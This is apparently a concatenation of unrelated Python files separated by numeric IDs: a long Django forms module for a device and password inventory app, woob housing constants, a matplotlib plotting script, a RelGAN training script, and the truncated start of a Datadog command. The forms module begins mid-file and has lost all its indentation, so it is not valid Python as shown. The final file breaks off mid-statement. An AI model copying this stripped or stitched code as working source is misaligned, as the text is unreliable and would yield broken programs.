large = forms.BooleanField(label = 'Large attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will have a separate display box.')
wikitext = forms.BooleanField(label = 'Wikitext attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed using wikitext parsing, implies "large".')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
class TemplateRuleFixedAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
string_value = forms.CharField(max_length = 100, label = 'String value',
help_text = 'The created attributes value.')
variable_expansion = forms.BooleanField(label = 'Expand variables',
required = False,
initial = False)
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
class TemplateRuleRegmatchAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
regexp = forms.CharField(max_length = 50, label = 'Regexp',
help_text = 'Regular expression that must match the input value.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
class TemplateRuleBoolAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
default = forms.ChoiceField(label = 'Default',
choices = (('true', 'True'), ('false', 'False')),
help_text = 'Default value for attribute.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
class TemplateRuleIntAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
default = forms.IntegerField(label = 'Default',
initial = 0,
help_text = 'Default value.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
class TemplateRuleDeleteAttributeAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to delete.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
class TemplateRuleFlushNodesAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, node_types, *args, **kwargs):
super(TemplateRuleFlushNodesAddForm, self).__init__(*args, **kwargs)
choices = []
for node_type in node_types:
choices.append((node_type, node_type))
field = forms.MultipleChoiceField(required = False,
label = 'Included node types',
choices = choices,
help_text = 'If no node types are chosen for include, all types will match.')
self.fields['include'] = field
field = forms.MultipleChoiceField(required = False,
label = 'Excluded node types',
choices = choices)
self.fields['exclude'] = field
class TemplateRuleFlushAssociationsAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, node_types, *args, **kwargs):
super(TemplateRuleFlushAssociationsAddForm, self).__init__(*args, **kwargs)
choices = []
for node_type in node_types:
choices.append((node_type, node_type))
field = forms.MultipleChoiceField(required = False,
label = 'Included node types',
choices = choices,
help_text = 'If no node types are chosen for include, all types will match.')
self.fields['include'] = field
field = forms.MultipleChoiceField(required = False,
label = 'Excluded node types',
choices = choices)
self.fields['exclude'] = field
class TemplateRulePasswordAddForm(forms.Form):
username = forms.CharField(max_length = 50, label = 'Username',
required = False)
passwd_description = forms.CharField(max_length = 50, label = 'Description',
required = False, help_text = 'Description of the added password.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, password_keys, *args, **kwargs):
super(TemplateRulePasswordAddForm, self).__init__(*args, **kwargs)
keylist = [('__no-password-key__', 'None')]
for key in password_keys:
keylist.append((key.oid, key.attributes['name']))
field = forms.ChoiceField(label = 'Password key', choices = keylist)
self.fields['passwordkey'] = field
class TemplateRuleSubdeviceAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
num_devices = forms.IntegerField(label = 'Number of subdevices',
min_value = 1, initial = 1,
help_text = 'Number of subdevices to create.')
sequence_offset = forms.IntegerField(label = 'Sequence offset',
initial = 0,
help_text = 'Base offset of sequence counter used when applying subdevice templates.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, templates, *args, **kwargs):
super(TemplateRuleSubdeviceAddForm, self).__init__(*args, **kwargs)
templatelist = [('none', 'None')]
for template in templates:
templatelist.append((template.oid, template.attributes['name']))
field = forms.ChoiceField(label = 'Template', choices = templatelist)
self.fields['template'] = field
class TemplateRuleAssignNetworkAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
class NetworkAttributeAddSelectTypeForm(forms.Form):
ruletype = forms.ChoiceField(label = 'Attribute type',
choices = (('text', 'text'),
('bool','boolean')))
class AttributeAddSelectTypeForm(forms.Form):
ruletype = forms.ChoiceField(label = 'Attribute type',
choices = (
('text', 'text'),
('bool', 'boolean'),
('int', 'int')
))
class AttributeUpdateTextForm(forms.Form):
value = forms.CharField(max_length = 50, label = 'New value',
required = False)
class AttributeUpdateBoolForm(forms.Form):
value = forms.BooleanField(label = 'New value (true/false)',
required = False)
class AttributeUpdateIntForm(forms.Form):
value = forms.IntegerField(label = 'New value', initial = 0)
class AttributeUpdateLargeTextForm(forms.Form):
def __init__(self, attribute, *args, **kwargs):
super(AttributeUpdateLargeTextForm, self).__init__(*args, **kwargs)
field = forms.CharField(
max_length=5000,
label=attribute.name,
initial=attribute.value,
required=False,
widget=forms.Textarea(attrs={'cols':'100', 'rows': '20'})
)
self.fields['value'] = field
class AttributeAddTextForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name',
widget=forms.TextInput(
attrs={
'placeholder': 'Name'
}
)
)
value = forms.CharField(
max_length=50,
label='Value',
required=False,
widget=forms.TextInput(
attrs={
'placeholder': 'Value'
}
)
)
ruletype = forms.CharField(
initial='text',
widget=forms.HiddenInput()
)
large = forms.BooleanField(
label='Large attribute',
required=False,
help_text='Attribute will have a separate display box.'
)
wikitext = forms.BooleanField(
label='Wikitext attribute',
required=False,
help_text='Attribute will be displayed using textile wikitext parsing, implies "large".'
)
hidden = forms.BooleanField(
label='Hidden attribute',
required=False,
        help_text='Attribute will be hidden by default if it is large/wikitext.'
)
important = forms.BooleanField(
label='Important attribute',
required=False,
help_text='Attribute will be displayed on a device/entities overview page.'
)
versions = forms.IntegerField(
label='Versions',
min_value=1,
initial=1,
help_text='If set to > 1 a versioned attribute will be created.'
)
class PasswordAttributeAddTextForm(AttributeAddTextForm):
encrypted = forms.BooleanField(
label='Encrypted attribute',
required=False,
help_text='Attribute will be encrypted using the same key as the parent password.'
)
class AttributeAddBoolForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
value = forms.ChoiceField(label = 'Value',
choices = (('true', 'True'), ('false', 'False')))
ruletype = forms.CharField(initial = 'bool',
widget = forms.HiddenInput())
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'If set to > 1 a versioned attribute will be created.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
help_text = 'If true, the attribute will be displayed on a device/entities overview page.')
class AttributeAddIntForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
value = forms.IntegerField(label = 'Integer Value', initial = 0)
ruletype = forms.CharField(initial = 'int',
widget = forms.HiddenInput())
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'If set to > 1 a versioned attribute will be created.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
help_text = 'If true, the attribute will be displayed on a device/entities overview page.')
class DeviceCategoryAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
class DeviceCategoryUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
class TemplateSelectForm(forms.Form):
def __init__(self, templates, permit_none = True, *args, **kwargs):
super(TemplateSelectForm, self).__init__(*args, **kwargs)
tmpllist = []
if permit_none:
tmpllist.append((-1, 'None'))
for template in templates:
tmpllist.append((template.oid,
template.attributes.get('name', '[UNKNOWN]')))
field = forms.ChoiceField(label = 'Select template',
choices = tmpllist)
self.fields['template'] = field
class TemplateSetForm(forms.Form):
def __init__(self, template, *args, **kwargs):
super(TemplateSetForm, self).__init__(*args, **kwargs)
rules = list(template.combinedRules())
        rules.sort(key=lambda x: x.attributes.get('priority', 10))
for rule in rules:
field = None
if rule.class_name == 'template rule text':
wikitext = rule.attributes.get('wikitext', False)
if not wikitext:
field = forms.CharField(max_length = 50,
label = rule.attr_name,
required = False,
help_text = rule.attributes.get('description', None))
elif rule.class_name == 'template rule regmatch':
if rule.attributes.get('description', None):
help_text = '%s (must match: %s)' % (
rule.attributes.get('description'),
rule.regexp
)
else:
help_text = 'Must match: "%s"' % (rule.regexp)
field = forms.RegexField(max_length = 50,
label = rule.attr_name,
regex = rule.regexp, required = False,
help_text = help_text)
elif rule.class_name == 'template rule bool':
field = forms.BooleanField(label = rule.attr_name,
required = False,
initial = rule.default_value,
help_text = rule.attributes.get('description', None))
elif rule.class_name == 'template rule int':
field = forms.IntegerField(label = rule.attr_name,
initial = rule.default_value,
help_text = rule.attributes.get('description', None))
elif rule.class_name == 'template rule subdevice':
field = forms.IntegerField(label = 'Number of subdevices',
required = False,
initial = rule.num_devices,
help_text = rule.attributes.get('description', None))
if field:
self.fields['argument-%s' % (rule.oid)] = field
for rule in template.combinedRules():
if rule.class_name in [
'template rule regmatch', 'template rule bool',
'template rule int', 'template rule subdevice']:
continue
if rule.class_name == 'template rule text':
wikitext = rule.attributes.get('wikitext', False)
if wikitext:
field = forms.CharField(max_length = 50,
label = rule.attr_name,
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', None))
else:
continue
elif rule.class_name == 'template rule password':
initial = ''
if rule.username:
initial = '%s' % (rule.username)
else:
initial = '[no username]'
if rule.description:
initial = '%s - %s' % (initial, rule.description)
field = forms.CharField(label = 'Add password',
required = False,
initial = initial,
widget=forms.TextInput(attrs={'readonly':'readonly'}),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule assign network':
field = forms.CharField(label = 'Auto-assign ip-address',
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule fixed':
field = forms.CharField(label = rule.attr_name,
required = False,
initial = rule.value,
widget=forms.TextInput(attrs={'readonly':'readonly'}),
help_text = rule.attributes.get('description', ''))
apply_label = 'Add attribute %s = %s' % (rule.attr_name, rule.value)
elif rule.class_name == 'template rule flush nodes':
field = forms.CharField(label = 'Flush existing nodes',
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule flush associations':
field = forms.CharField(label = 'Flush existing associations',
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule delete attribute':
field = forms.CharField(label = 'Delete attribute',
required = False,
initial = rule.attr_name,
widget=forms.TextInput(attrs={'readonly':'readonly'}),
help_text = rule.attributes.get('description', ''))
else:
field = forms.CharField(label = rule.class_name,
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
self.fields['argument-%s' % (rule.oid)] = field
# field = forms.BooleanField(label = 'Overwrite',
# required = False,
# initial = True,
# help_text = 'Overwrite existing attributes that have the same name as an attribute being created.')
# self.fields['overwrite'] = field
# self.fields['template'] = forms.CharField(initial = template.oid,
# widget = forms.HiddenInput())
class DeviceSetValuesForm(forms.Form):
def __init__(self, rules, *args, **kwargs):
super(DeviceSetValuesForm, self).__init__(*args, **kwargs)
for rule in rules:
is_wikitext = rule.attributes.get('wikitext', False)
if rule.dtype == 'text' and not is_wikitext:
field = forms.CharField(max_length = 50, label = rule.name,
required = False,
help_text = rule.attributes.get('description', None))
self.fields['attr-%s' % (rule.oid)] = field
elif rule.dtype == 'text' and is_wikitext:
widget = forms.HiddenInput()
field = forms.CharField(label = rule.name, widget = widget,
initial = ' ')
self.fields['attr-%s' % (rule.oid)] = field
elif rule.dtype == 'regmatch':
field = forms.RegexField(max_length = 50, label = rule.name,
regex = rule.value, required = False,
help_text = 'Must match: "%s"' % (rule.value))
self.fields['attr-%s' % (rule.oid)] = field
# elif rule.dtype == 'fixed':
# widget = forms.HiddenInput()
# field = forms.CharField(max_length = 50, label = rule.name,
# widget = widget, initial = rule.value)
# self.fields['attr-%s' % (rule.oid)] = field
            elif rule.dtype == 'bool':
field = forms.BooleanField(label = rule.name, required = False,
initial = rule.attributes.get('default', True),
help_text = rule.attributes.get('description', None))
self.fields['attr-%s' % (rule.oid)] = field
else:
pass
class DeviceNetworkAddForm(forms.Form):
def __init__(self, network_trees, *args, **kwargs):
super(DeviceNetworkAddForm, self).__init__(*args, **kwargs)
nt_choices = []
for tree in network_trees:
value = (tree.oid, tree.attributes.get('name', '[UNKNOWN]'))
if tree.attributes.get('default', False) is True:
nt_choices.insert(0, value)
else:
nt_choices.append(value)
field = forms.ChoiceField(label = 'Network Tree',
choices = nt_choices,
help_text = 'Network tree for address.')
self.fields['networktree'] = field
self.fields['network_name'] = \
forms.CharField(max_length = 50, label = 'IP-Address',
help_text = 'Valid forms: host: "a.b.c.d", '
'cidr subnet: "a.b.c.d/nn"')
self.fields['description'] = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
class UserAddForm(forms.Form):
    user_name = forms.CharField(max_length = 50, label = 'User Name')
real_name = forms.CharField(max_length = 50, label = 'Real Name (optional)',
required = False)
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
administrator = forms.BooleanField(label = 'Administrator',
required = False,
initial = False)
password = forms.CharField(max_length = 32, label = 'Password',
widget = forms.PasswordInput(), required = True)
validate = forms.CharField(max_length = 32, label = 'Password (again)',
widget = forms.PasswordInput(), required = True)
class UserUpdateAdminForm(forms.Form):
user_name = forms.CharField(max_length = 50, label = 'User Name')
real_name = forms.CharField(max_length = 50, label = 'Real Name (optional)',
required = False)
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
administrator = forms.BooleanField(label = 'Administrator',
required = False,
initial = False)
class UserUpdateForm(forms.Form):
user_name = forms.CharField(max_length = 50, label = 'User Name')
real_name = forms.CharField(max_length = 50, label = 'Real Name (optional)',
required = False)
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
class UserResetPasswordForm(forms.Form):
password = forms.CharField(max_length = 32, label = 'Password',
widget = forms.PasswordInput(), required = False,
            help_text = 'Resetting the password for a user will disconnect all subkeys etc. Use this if the old password for the user is unknown.')
validate = forms.CharField(max_length = 32, label = 'Password (again)',
widget = forms.PasswordInput(), required = False)
class UserUpdatePasswordForm(forms.Form):
password = forms.CharField(max_length = 32, label = 'New Password',
widget = forms.PasswordInput(), required = False)
validate = forms.CharField(max_length = 32, label = 'New Password (again)',
widget = forms.PasswordInput(), required = False)
old_password = forms.CharField(max_length = 32, label = 'Old Password',
widget = forms.PasswordInput(), required = False,
help_text = 'Needs to be supplied if you are changing the password of a user other than your own.')
class UserConnectKeyForm(forms.Form):
password_key_key = forms.CharField(max_length = 32, label = 'Password key password',
widget = forms.PasswordInput(), required = False,
help_text = 'Required if the current active user doesn\'t have the selected password key connected.')
def __init__(self, password_keys, require_user_password, *args, **kwargs):
super(UserConnectKeyForm, self).__init__(*args, **kwargs)
self.message = '''
If you're connecting a password key for another user, keep in mind that the
user must log out and log back in to siptrack before the key will be connected.
'''
keylist = []
for key in password_keys:
value = (key.oid, key.attributes['name'])
if key.attributes.get('default', False) is True:
keylist.insert(0, value)
else:
keylist.append(value)
field = forms.ChoiceField(label = 'Password key', choices = keylist)
self.fields['passwordkey'] = field
if require_user_password:
field = forms.CharField(
max_length=32,
label='User\'s password',
help_text='Required to create the users keypair if they\'ve never logged in before.',
widget=forms.PasswordInput(),
required=False
)
self.fields['user_password'] = field
class UserManagerLocalAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
class UserManagerLDAPAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
connection_type = forms.ChoiceField(label = 'Connection type',
choices = (('ldap', 'ldap'), ('ldaps', 'ldaps')))
server = forms.CharField(max_length = 256, label = 'LDAP server')
port = forms.CharField(max_length = 5, label = 'LDAP server port')
base_dn = forms.CharField(max_length = 128, label = 'Base DN')
valid_groups = forms.CharField(max_length = 1000, label = 'Valid LDAP group',
                                   help_text = 'Only members of the given group will be able to log in, use ":" to separate groups.',
required = False)
class UserManagerActiveDirectoryAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
server = forms.CharField(max_length = 256, label = 'AD server')
base_dn = forms.CharField(max_length = 128, label = 'Base DN')
valid_groups = forms.CharField(max_length = 1000, label = 'Valid LDAP group',
                                   help_text = 'Only members of the given group will be able to log in, use ":" to separate groups.',
required = False)
user_domain = forms.CharField(max_length = 128, label = 'User Domain')
class DeviceResetForm(forms.Form):
reset_attributes = forms.BooleanField(label = 'Reset attributes',
required = False,
initial = True)
reset_device_links = forms.BooleanField(label = 'Reset device links',
required = False,
initial = False)
reset_passwords = forms.BooleanField(label = 'Reset passwords',
required = False,
initial = True)
reset_subdevices = forms.BooleanField(label = 'Reset subdevices',
required = False,
initial = True)
class ConfigAddSelectTypeForm(forms.Form):
def __init__(self, parent, *args, **kwargs):
super(ConfigAddSelectTypeForm, self).__init__(*args, **kwargs)
choices = []
if parent.class_name not in ['view tree', 'ipv4 network',
'ipv6 network', 'network tree', 'ipv4 network range',
'ipv6 network range']:
choices.append(('netautoassign', 'Network auto assignment'))
choices.append(('value', 'Config value'))
field = forms.ChoiceField(label = 'Config type', choices = choices)
self.fields['config_type'] = field
class ConfigAddNetworkAutoassignForm(forms.Form):
config_type = forms.CharField(initial = 'netautoassign',
widget = forms.HiddenInput())
def __init__(self, network_trees, *args, **kwargs):
super(ConfigAddNetworkAutoassignForm, self).__init__(*args, **kwargs)
nt_choices = []
for tree in network_trees:
value = (tree.oid, tree.attributes.get('name', '[UNKNOWN]'))
if tree.attributes.get('default', False) is True:
nt_choices.insert(0, value)
else:
nt_choices.append(value)
field = forms.ChoiceField(label = 'Network Tree',
choices = nt_choices,
help_text = 'Network tree for address.')
self.fields['networktree'] = field
self.fields['range_start'] = \
forms.CharField(max_length = 50, label = 'Range Start',
                            help_text = 'Enter the start address of the range used for assignment')
self.fields['range_end'] = \
forms.CharField(max_length = 50, label = 'Range End',
                            help_text = 'Enter the end address of the range used for assignment')
class ConfigAddValueForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
value = forms.CharField(max_length = 50, label = 'Value', required = False)
config_type = forms.CharField(initial = 'value',
widget = forms.HiddenInput())
class PermissionAddForm(forms.Form):
read_access = forms.BooleanField(label = 'Read access',
required = False)
write_access = forms.BooleanField(label = 'Write access',
required = False)
all_users = forms.BooleanField(label = 'Applies to all users',
required = False)
recursive = forms.BooleanField(label = 'Recursive',
required = False,
help_text = 'Applies recursively up the node tree.')
def __init__(self, users, groups, *args, **kwargs):
super(PermissionAddForm, self).__init__(*args, **kwargs)
field = forms.MultipleChoiceField(required = False,
label = 'Users',
choices = users,
help_text = 'Included users.')
self.fields['users'] = field
field = forms.MultipleChoiceField(required = False,
label = 'Groups',
choices = groups,
help_text = 'Included groups.')
self.fields['groups'] = field
class UserGroupAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description',
required = False)
def __init__(self, users, *args, **kwargs):
super(UserGroupAddForm, self).__init__(*args, **kwargs)
field = forms.MultipleChoiceField(required = False,
label = 'Users',
choices = users,
help_text = 'Included users.')
self.fields['users'] = field
class UserGroupUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
def __init__(self, users, *args, **kwargs):
super(UserGroupUpdateForm, self).__init__(*args, **kwargs)
field = forms.MultipleChoiceField(required = False,
label = 'Users',
choices = users,
help_text = 'Included users.')
self.fields['users'] = field
class CommandAddForm(forms.Form):
freetext = forms.CharField(max_length = 200, label = 'Command text')
class CommandUpdateForm(forms.Form):
freetext = forms.CharField(max_length = 200, label = 'Command text')
class CommandQueueAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class CommandQueueUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class EventTriggerAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class EventTriggerUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class EventTriggerRulePythonAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
code = forms.CharField(max_length = 5000, label = 'Code',
help_text = 'python code',
widget = forms.Textarea(attrs={'cols':'80', 'rows': '50'}))
class EventTriggerRulePythonUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
code = forms.CharField(max_length = 5000, label = 'Code',
help_text = 'python code',
widget = forms.Textarea(attrs={'cols':'80', 'rows': '50'}))
class UsermanagerADSyncUsersForm(forms.Form):
username = forms.CharField(max_length = 50, label = 'Username')
password = forms.CharField(max_length = 32, label = 'Password',
widget = forms.PasswordInput(), required = True)
class PasswordCategoryAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
class DeviceCopyForm(forms.Form):
skip_attributes = forms.BooleanField(label = 'Skip attributes',
required = False, initial = False)
skip_devices = forms.BooleanField(label = 'Skip sub-devices',
required = False, initial = False)
skip_networks = forms.BooleanField(label = 'Skip networks',
required = False, initial = True)
class AttributeEditNotesForm(forms.Form):
notes = forms.CharField(max_length = 50000, label = '',
help_text = '',
required = False,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
class AttributeQuickeditForm(forms.Form):
value = forms.CharField(max_length = 100, required = False,
label = 'Value')
class RackUnitOccupiedForm(forms.Form):
reason = forms.CharField(max_length = 500, required = False,
label = 'Reason',
help_text = 'Describe what is occupying this unit.')
class RackUnitReservedForm(forms.Form):
reason = forms.CharField(max_length = 500, required = False,
label = 'Reason',
help_text = 'Describe why this unit is reserved.')
class DeviceConfigAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
max_versions = forms.IntegerField(label = 'Retained versions',
min_value = 0, initial = 10,
help_text = 'The number of config versions to retain, set to 0 for unlimited.')
class DeviceConfigSubmitForm(forms.Form):
data = forms.CharField(max_length = 1000000, label = '',
help_text = '',
required = True,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
class DeviceConfigTemplateAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
data = forms.CharField(max_length = 1000000, label = '',
help_text = '',
required = True,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
class DeviceConfigTemplateSubmitForm(forms.Form):
data = forms.CharField(max_length = 1000000, label = '',
help_text = '',
required = True,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
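# Usage sketch (illustrative, not part of the original module): the plain forms above are
# used like any Django form; `create_user` stands in for whatever view logic consumes it.
#   form = UserAddForm(request.POST)
#   if form.is_valid():
#       create_user(form.cleaned_data['user_name'], form.cleaned_data['password'])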
|
38634
|
from woob.capabilities.housing import POSTS_TYPES, HOUSE_TYPES
TYPES = {POSTS_TYPES.RENT: 1,
POSTS_TYPES.SALE: 2,
POSTS_TYPES.FURNISHED_RENT: 1,
POSTS_TYPES.VIAGER: 5}
RET = {HOUSE_TYPES.HOUSE: '2',
HOUSE_TYPES.APART: '1',
HOUSE_TYPES.LAND: '4',
HOUSE_TYPES.PARKING: '3',
HOUSE_TYPES.OTHER: '10'}
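# Example: TYPES[POSTS_TYPES.RENT] == 1 and RET[HOUSE_TYPES.APART] == '1'; these map woob
# enum values to the target site's numeric codes (the meaning of each code is site-specific).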
|
38662
|
from pathlib import Path
import matplotlib.pyplot as plt
import pandas as pd
results_dir = Path('results')
results_dir.mkdir(exist_ok=True)
# Performance plot
for scale in [3, 4]:
for test_set in ['Set5', 'Set14']:
time = []
psnr = []
model = []
for save_dir in sorted(Path('.').glob(f'*-sc{scale}')):
if 'bicubic' not in save_dir.stem:
model += [save_dir.stem.rsplit('-', 1)[0].upper()]
metrics_file = save_dir / f'test/{test_set}/metrics.csv'
metrics = pd.read_csv(str(metrics_file), index_col='name')
time += [metrics.time.average]
psnr += [metrics.psnr.average]
plt.figure()
plt.semilogx(time, psnr, '.')
plt.grid(True, which='both')
for x, y, s in zip(time, psnr, model):
if 'NS' in s:
s = s.split('-')[1]
plt.text(x, y, s)
plt.xlabel('Run time (sec)')
plt.ylabel('PSNR (dB)')
plt.title(f'Scale {scale} on {test_set}')
plt.savefig(str(results_dir / f'performance-sc{scale}-{test_set}.png'))
plt.close()
# History plot
for scale in [3, 4]:
plt.figure()
for save_dir in sorted(Path('.').glob(f'*-sc{scale}')):
if 'bicubic' not in save_dir.stem:
model = save_dir.stem.rsplit('-', 1)[0].upper()
            history_file = save_dir / 'train/history.csv'
history = pd.read_csv(str(history_file))
plt.plot(history.epoch, history.val_psnr, label=model, alpha=0.8)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('Average test PSNR (dB)')
plt.savefig(str(results_dir / f'history-sc{scale}.png'))
plt.xlim(0, 500)
if scale == 3:
plt.ylim(31.5, 34.5)
if scale == 4:
plt.ylim(29, 32)
plt.savefig(str(results_dir / f'history-sc{scale}-zoom.png'))
plt.close()
|
38671
|
import tensorflow as tf
from nalp.corpus import TextCorpus
from nalp.datasets import LanguageModelingDataset
from nalp.encoders import IntegerEncoder
from nalp.models import RelGAN
# Creating a character TextCorpus from file
corpus = TextCorpus(from_file='data/text/chapter1_harry.txt', corpus_type='char')
# Creating an IntegerEncoder, learning encoding and encoding tokens
encoder = IntegerEncoder()
encoder.learn(corpus.vocab_index, corpus.index_vocab)
encoded_tokens = encoder.encode(corpus.tokens)
# Creating Language Modeling Dataset
dataset = LanguageModelingDataset(encoded_tokens, max_contiguous_pad_length=10, batch_size=64)
# Creating the RelGAN
relgan = RelGAN(encoder=encoder, vocab_size=corpus.vocab_size, max_length=10,
embedding_size=256, n_slots=5, n_heads=5, head_size=25, n_blocks=1, n_layers=3,
n_filters=(64, 128, 256), filters_size=(3, 5, 5), dropout_rate=0.25, tau=5)
# Compiling the RelGAN
relgan.compile(pre_optimizer=tf.optimizers.Adam(learning_rate=0.01),
d_optimizer=tf.optimizers.Adam(learning_rate=0.0001),
g_optimizer=tf.optimizers.Adam(learning_rate=0.0001))
# Pre-fitting the RelGAN
relgan.pre_fit(dataset.batches, epochs=200)
# Fitting the RelGAN
relgan.fit(dataset.batches, epochs=50)
# Saving RelGAN weights
relgan.save_weights('trained/relgan', save_format='tf')
|
38684
|
import os
import re
import subprocess
from collections import Counter
from django.conf import settings
from django.core.management.base import BaseCommand
import datadog
from dimagi.ext.couchdbkit import Document
from corehq.feature_previews import all_previews
from corehq.toggles import all_toggles
class DatadogLogger:
def __init__(self, stdout):
self.stdout = stdout
self.datadog = os.environ.get("TRAVIS_EVENT_TYPE") == 'cron'
if self.datadog:
